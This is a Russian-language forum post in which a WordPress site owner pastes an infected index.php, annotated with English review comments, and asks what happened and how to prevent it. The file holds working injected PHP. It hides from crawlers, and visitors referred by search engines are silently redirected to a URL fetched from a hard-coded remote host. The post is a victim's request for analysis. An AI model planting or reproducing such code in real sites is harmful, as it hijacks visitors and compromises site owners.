devellopah
@devellopah

Как внедрили этот вредоносный код в index.php?

Сайт на вордпресс, лежит на рег хостинге.
Index.php теперь выглядит следующим образом:
<?php
// NOTE(review): the statements from here down to the `exit;` block contradict this
// file's own header docblock, which says the file does nothing except load
// wp-blog-header.php. They run on every request, before WordPress is loaded.
// Nothing in this file shows how it was modified; that has to be established from
// server/FTP/panel access logs and file timestamps.

// Turn off all PHP error reporting, so notices and warnings raised by the code below
// (for example a request without a Referer header) are not reported.
error_reporting(0);
// Remove the script execution time limit.
set_time_limit(0);
// Client-supplied Referer header, read without checking that it is present.
$ref=$_SERVER['HTTP_REFERER'];
// Client-supplied User-Agent header, likewise read unchecked.
$userhttp=$_SERVER["HTTP_USER_AGENT"];
// Pipe-separated list of plain substrings (search engines, social networks, other
// link sources). Further down it is split on '|' and each entry is tested against
// the Referer with strpos(); a hit marks the visitor as having arrived from one of
// these sites.
// NOTE(review): the literal contains a line break after "mamma75" as shown on the
// page; this may be a wrapping artifact of the paste - confirm against the file on disk.
$search='.aol.|.astronaut.at|.austronaut.at|.dastelefonbuch.de|.exalead.|.excite.|.sm.cn|.zoek.nl|1.cz|1881.no|2gis.ru|Keywords|Sozluk.com|abacho.|abcsolk.no|acoon.de|alexa.com|aliceadsl.fr|all.by|alltheweb.com|altavista.|amazon.com|apollo.lv/portal/search/|apollo7.de|apontador.com.br|arama.com|arcor.de|ariadna.elmundo.es|arianna.com|ask.|askkids.com|badoo.com|baidu.com|be-fr.altavista.com|be-nl.altavista.com|bebo.com|bing.com|bingj.com|blackplanet.com|blekko.com|blogdigger.com|blogpulse.com|blogs.icerocket.com|busca.orange.es|busca.uol.com.br|buscador.terra|buzznet.com|centrum.cz|cercato.it|charter.net|class.hit-parade.com|classmates.com|clusty.com|cnn.com|crawler.com|cuil.com|darkoogle.com|dasoertliche.de|delicious.com|digg.com|disq.us|disqus.com|dizionario.it.msn.com|dmoz.org|dogpile.com|donanimhaber.com|douban.com|duckduckgo.com|ecosia.org|eniro.se|eo.st|eu.ixquick.com|eurip.com|euroseek.com|everyclick.com|facebook.|fastweb.it|fb.me|find.tdc.dk|finderoo.com|fireball.de|firstsfind.com|fixsuche.de|flickr.com|flix.de|flixster.com|forestle.mobi|forestle.org|forums.whirlpool.net.au|fotolog.com|foursquare.com|fr2.rpmfind.net|francite.com|fresh-weather.com|friendfeed.com|friendsreunited.com|friendster.com|gaiaonline.com|gais.cs.ccu.edu.tw|geni.com|geona.net|getpocket.com|gigablast.com|github.com|global.cyworld.com|gnadenmeer.de|go.mail.ru|gomeo.com|google.|googleearth.|googleusercontent.com|goyellow.de|gulesider.no|habbo.com|hi5.com|highbeam.com|hit-parade.com|hledani.tiscali.cz|hocam.com|holmes.ge|hooseek.com|hotbot.com|hyves.nl|icq.com|identi.ca|ilse.nl|inbox.com|inci.sozlukspot.com|incisozluk.cc|incisozluk.com|incredimail.|infospace.com|instagram.|instela.com|itusozluk.com|ixquick.com|ixquick.de|jungle-spider.de|junglekey.|jyxo.1188.cz|kataweb.it|kununu.com|kvasir.no|lastfm.ru|latne.lv|lemoteur.|libero.it|link.2gis.ru|linkedin.com|listings.altavista.com|live.com|liveinternet.ru|livejournal.ru|lnkd.in|lo.st|looksmart.com|lycos.com|maailm.com|mail.ru|mamma.com|mamma75
.mamma.com|marktplaats.nl|meinestadt.de|meta.rrzn.uni-hannover.de|meta.ua|metacrawler.|metager.de|metager2.de|mister-wong.|mixi.jp|moikrug.ru|monstercrawler.com|mozbot.|msnbc.msn.com|multiply.com|my.mail.ru|myheritage.com|mylife.ru|myspace.com|myyearbook.com|najdi.si|neti.ee|netlog.com|news.ycombinator.com|nigma.ru|nk.pl|nova.rambler.ru|odnoklassniki.ru|ok.ru|online.no|orkut.com|otsing.delfi.ee|paper.li|paperball.de|pesquisa.|pinterest.com|plaxo.com|plazoo.com|poisk.ru|pricerunner.co.uk|qbyrd.com|qualigo.|quark.sm.cn|quora.com|qwant.com|qzone.qq.com|reddit.com|renren.com|req.-hit-parade.com|rpmfind.net|search-dyn.tiscali.it|search-intl.netscape.com|search-results.com|search.|search1-1.free.fr|search1-2.free.fr|searchalot.com|searchatlas.centrum.cz|searchcanvas.com|searches.globososo.com|searchresults.verizon.com|searchthis.com|searchy.co.uk|serach.comcast.net|sharelook.fr|skynet.be|skyrock.com|sm.aport.ru|smart.delfi.lv|so.360.cn|so.com|so.m.sm.cn|sonico.com|soso.com|sosodesktop.com|sougou.com|sourceforge.net|sourtimes.org|stackoverflow.com|start.facemoods.com|start.iplay.com|startsiden.no|studivz.net|stumbleupon.com|suche.aolsvc.de|suche.freenet.de|suche.gmx.net|suche.info|suche.web.de|suchmaschine.com|suchnase.de|szukaj.onet.pl|szukaj.wp.pl|t-online.de|t.umblr.com|tagged.com|talktalk.co.uk|taringa.net|technorati.com|teoma.com|tixuma.de|toile.com|toolbarhome.com|trouvez.com|trovarapido.com|tuenti.com|tumblr.com|twingly.com|twitter.com|uludagsozluk.com|ulusozluk.com|url.org|us.ixquick.com|verden.abcsok.no|viadeo.com|vimeo.com|vinden.nl|vindex.nl|virgilio.it|vk.com|vkontakte.ru|vkrugudruzei.ru|vshare.toolbarhome.com|walhello.|wayn.com|web.canoe.ca|web.gougou.com|web.nl|web.skype.com|web.toile.com|web.volny.cz|web.whatsapp.com|webcrawler.com|webfetch.com|weborama.com|weeworld.com|weibo.com|witch.de|x-recherche.com|xanga.com|xing.com|yahoo.|yandex.|yasni.|yatedo.|yougoo.fr|youtu.be|youtube.com|ys.mirostart.com|yz.m.sm.cn|zapmeta.|zhongsou.com|zoeken.nl|zoohoo.cz';
// Pipe-separated list of User-Agent substrings naming crawlers, SEO/monitoring bots,
// site copiers and scripted HTTP clients. Further down it is split on '|' and tested
// against the User-Agent with strpos(); a hit switches the redirect off for that
// request, so these clients are served the normal site instead of the redirect.
$b1223='Abonti|aggregator|AhrefsBot|Aport|asterias|Baiduspider|bingbot|binance|BackupLand|Barkrowler|BDCbot|Birubot|BLEXBot|BUbiNG|BuiltBotTough|Bullseye|BunnySlippers|Butterfly|CamontSpider|CCBot|Cegbfeieh|CheeseBot|CherryPicker|coccoc|CopyRightCheck|cosmos|crawler|Crescent|CyotekWebCopy|CyotekHTTP|DataForSeoBot|DeuSu|discobot|DittoSpyder|DnyzBot|DomainCrawler|DotBot|DownloadNinja|dcrawl|EasouSpider|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|ExtractorPro|Ezooms|facebookexternalhit|FairShare|Fasterfox|FeedBooster|Foobot|Genieo|GetIntentCrawler|Gigabot|GrapeshotCrawler|Go-http-client|Harvest|hloader|HTTrack|humanlinks|HybridBot|ieautodiscovery|Incutio|InfoNaviRobot|InternetSeer|ips-agent|IstellaBot|JamesBOT|JennyBot|JS-Kit|Jooblebot|k2spider|Kenjin|kmSearchBot|larbin|LexiBot|Linguee|LinkExchanger|LinkextractorPro|linko|LinkWalker|LinkpadBot|lmspider|LNSpiderguy|ltx71|lwp-trivial|Mail.RU_Bot|magpie|MataHari|MaxPointCrawler|MegaIndex|memoryBot|MIIxpc|Mippin|MisterPiX|MJ12bot|MLBot|moget|MSIECrawler|msnbot|msnbot-media|NetAnts|NetcraftSurveyAgent|NICErsPRO|NjuiceBot|NPBot|Nutch|OfflineExplorer|OLEcrawler|Openfind|openstat.ru|panscient|PostRank|PetalBot|ProWebWalker|ptd-crawler|Purebot|PycURL|QueryNMetasearch|RepoMonkey|Riddler|RMA|Scrapy|SemrushBot|serf|SeznamBot|SISTRIX|SiteBot|SiteSnagger|Serpstat|Slurp|SnapPreviewBot|Sogou|Soup|SpankBot|spanner|spbot|Spinn3r|SpyFu|statdom.ru|SputnikBot|suggybot|SurveyBot|suzuran|Teleport|Telesoft|TheIntraformant|TheNomad|TightTwatBot|Titan|True_Robot|ttCrawler|turingos|TurnitinBot|TOBBOT|UbiCrawler|UnisterBot|URLyWarning|VCI|Vedma|Voyager|WBSearchBot|WebAuto|WebBandit|WebDataStats|WebCopier|WebEnhancer|WebmasterWorldForumBot|WebReaper|webprosbot|WebSauger|WebStripper|WebZip|Wotbox|YottosBot|Yeti|YandexFavicons|Zao|Zeus|ZyBORG|python\-requests|ALittle\ Client|Apache\-HttpClient';
// Redirect gate, part 1: stays true unless the User-Agent matches the $b1223 list.
$start=true;
// Redirect gate, part 2: becomes true only if the Referer matches the $search list.
$dearchg=false;
// Case-sensitive substring test of every $b1223 entry against the User-Agent.
// On the first hit the client is given the GA_r cookie (value 1, lifetime
// 259200 s = 3 days, path "/") and the redirect is disabled for this request.
$oct=explode('|',$b1223);
foreach($oct as $vald){if(strpos($userhttp,$vald) !== FALSE){setcookie('GA_r',1,time()+259200,'/');$start=false;break;}};
// Same substring test for the Referer: a hit on any $search entry marks the request
// as coming from a search engine / social network / listed site.
$oct=explode('|',$search);
foreach($oct as $vald){if(strpos($ref,$vald) !== FALSE){$dearchg=true;break;}};
// Conditional redirect. It fires only when all three hold: the request carries no
// (truthy) GA_r cookie, the User-Agent did not match the bot list, and the Referer
// matched the $search list. Requests without such a Referer (e.g. the site opened by
// typing its address) fall through to the normal WordPress load below, which is why
// the behaviour is easy to miss when checking the site directly.
// Indicators visible in this block: the GA_r cookie, outbound HTTP requests from the
// web server to the hard-coded host, and an extensionless file named with a
// 32-character MD5 hex digest in the same directory as this file.
if(!$_COOKIE["GA_r"] && $start === true && $dearchg === true){
	// Cache file name: the MD5 hex digest of the literal string "index.php".
	$filename = md5("index.php");
	// Directory containing this file; the cache file is kept next to it.
	$path = dirname(__FILE__);
	if(file_exists($path."/".$filename)) {
		// Age of the cached value is taken from the cache file's modification time.
		$timer = filemtime($path."/".$filename);
	} else {
		// No cache yet: use a timestamp 130 s in the past so the refresh branch runs.
		$timer = time()-130;
	}
	$res = '';
	// Refresh when the cached value is at least 120 seconds old.
	if(time()-120 >= $timer){
		// Preferred transport: cURL, plain HTTP GET to the hard-coded host, 6 s timeout.
		if(function_exists('curl_version')){
			$curl = curl_init();
			curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
			curl_setopt($curl, CURLOPT_URL, 'http://wpingfort.shop/');
			curl_setopt($curl, CURLOPT_TIMEOUT, 6);
			$res = curl_exec($curl);
			curl_close($curl);
		}
		// Fallback when cURL is unavailable or returned nothing: fetch the same URL
		// through the PHP stream wrapper.
		if($res == ''){
			$res = file_get_contents('http://wpingfort.shop/');
		}
		// The response body is written to the cache file as-is, without validation.
		file_put_contents($path."/".$filename, $res);
	} else {
		// Cache is fresh: reuse the stored response body.
		$res = file_get_contents($path."/".$filename);
	}
	// Mark this browser for 3 days (259200 s) so the same visitor is not redirected
	// again while the cookie is present.
	setcookie('GA_r' , 1, time() + 259200, '/');
	// The fetched/cached body is used verbatim as the redirect target, so the
	// destination is whatever the remote host returns at that moment.
	header('Location: '. $res);
	// Stop here: WordPress is never loaded for a redirected request.
	exit;
}
// NOTE(review): from this docblock onward the content reads like the original
// WordPress front controller (define WP_USE_THEMES, then require wp-blog-header.php).
// When cleaning up, replace the whole file with a pristine copy from the same
// WordPress release instead of hand-editing this one - TODO confirm the match.
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Возможно (скорее всего), ещё что-то изменили и в других папках.

Несколько вопросов в связи с текущей ситуацией:
1) что происходит в файле?
2) как официально называется такой тип взлома?
3) это ответственность хостинга или разработчика сайта?
4) как предотвратить повторение подобного в будущем (после восстановления сайта)?